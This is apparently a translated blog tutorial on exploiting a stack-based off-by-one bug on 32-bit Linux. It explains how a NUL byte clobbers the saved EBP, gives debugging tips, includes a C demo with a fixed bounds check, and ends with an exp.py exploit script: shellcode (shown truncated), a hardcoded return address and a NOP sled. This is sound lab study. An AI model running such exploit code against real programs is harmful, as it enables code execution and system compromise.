Linux (x86) Exploit Series III Off-By-One Vulnerability (Stack Based)

Off-By-One vulnerability (stack based)

Original address: https://bbs.pediy.com/thread-216954.htm

What is off by one?

Copying a source string into a destination buffer can cause an off-by-one:

1. The length of the source string is equal to the length of the destination buffer.

When the length of the source string equals the length of the destination buffer, the copy places a single NULL byte just past the end of the destination buffer. Since the destination buffer here is on the stack, that single NULL byte overwrites the least significant byte of the caller's saved EBP, which can lead to arbitrary code execution.
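To make that mechanism concrete, here is an added example (not code from the original post): the length check that lets a source of exactly the buffer size through, beside the corrected check, with a guard byte standing in for the low byte of the saved EBP so the one-byte overwrite is observable. The 256-byte buffer size is an assumption taken from the payload size in exp.py; the vulnerable function itself is not shown on the page.

```c
#include <stdlib.h>
#include <string.h>
/* Buffer size is an assumption: the page does not show the vulnerable
 * function, but exp.py's payload is 68 + 4 + 30 + 28 + 126 = 256 bytes. */
#define BUF_LEN 256
#define GUARD 0xAA /* constructed stand-in for the low byte of the saved EBP */

/* Copies src through a length check and reports whether the byte just past
 * the buffer (where the saved EBP's low byte sits on the stack) was changed.
 * Modelled on the heap so the overwrite is observable without corrupting a
 * real frame. strict == 0 is the off-by-one check (len > BUF_LEN); strict == 1
 * is the corrected check (len >= BUF_LEN) that keeps room for the NUL.
 * Returns -1 if rejected, 1 if the guard byte was clobbered, 0 if intact. */
static int copy_and_probe(const char *src, int strict)
{
    unsigned char *mem = malloc(BUF_LEN + 1);
    size_t len = strlen(src);
    int clobbered;
    if (mem == NULL) return -2;
    mem[BUF_LEN] = GUARD;
    if (strict ? (len >= BUF_LEN) : (len > BUF_LEN)) {
        free(mem);
        return -1;
    }
    strcpy((char *)mem, src); /* writes len + 1 bytes: the NUL is the extra one */
    clobbered = (mem[BUF_LEN] != GUARD);
    free(mem);
    return clobbered;
}

int vulnerable_copy(const char *src) { return copy_and_probe(src, 0); }
int hardened_copy(const char *src) { return copy_and_probe(src, 1); }

/* The NUL clears the low byte of the saved EBP, so after the callee returns
 * the caller's frame pointer lands up to 255 bytes lower, inside the buffer
 * the caller just filled; that is why a single zero byte is enough. */
unsigned int ebp_after_null_byte(unsigned int saved_ebp)
{
    return saved_ebp & 0xffffff00u;
}

/* Constructed sample input: n 'A' bytes in a static buffer (capped). */
const char *constructed_input(size_t n)
{
    static char s[BUF_LEN + 2];
    if (n > BUF_LEN + 1) n = BUF_LEN + 1;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}
```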

With the term defined, let's look at the off-by-one exploit code!

I'm too lazy to paste all of it, so let's refer to the original text and explain only part of it here.

The original text explains it very clearly, so I will only cover the pitfalls I ran into while debugging.

The first is that this one uses core-file debugging. The compile options are: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

Note that without the -g option the binary is not built with debug information. Without debug information you cannot set source-level breakpoints in gdb, so you can only debug from the core file.

The author also gave the method for debugging with the core file, but after I ran python exp.py no core file appeared. After looking it up and checking with the ulimit -c command, the value turned out to be 0: the system (by default, it seems) does not allow core files to be created. To change the limit, run ulimit -c 1000.

After modification, the core file is generated normally.

Another pitfall is that the address of buf when debugging under gdb is not the same as the address of buf in a real run outside gdb, and the offset changes as well; this needs special attention.

As usual, here is the exp.py that I got working:

#!/usr/bin/env python
#exp.py
import struct
from subprocess import call

#Spawn a shell.
#execve(/bin/sh) Size- 28 bytes.
#NOTE: this line was cut off in the original post after "\x89"; the rest of the shellcode is not shown.
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"

ret_addr = 0xbffff426

#endianness conversion: pack the address as a 32-bit little-endian value
def conv(num):
 return struct.pack("<I",num)

#Layout: junk + return address + NOP's + shellcode + junk (68 + 4 + 30 + 28 + 126 = 256 bytes)
buf = "A" * 68
buf += conv(ret_addr)
buf += "\x90" * 30
buf += scode
buf += "A" * 126

print "Calling vulnerable program"
call(["./vuln", buf])

Virtual Machine Installation: Ubuntu 12.04 (x86)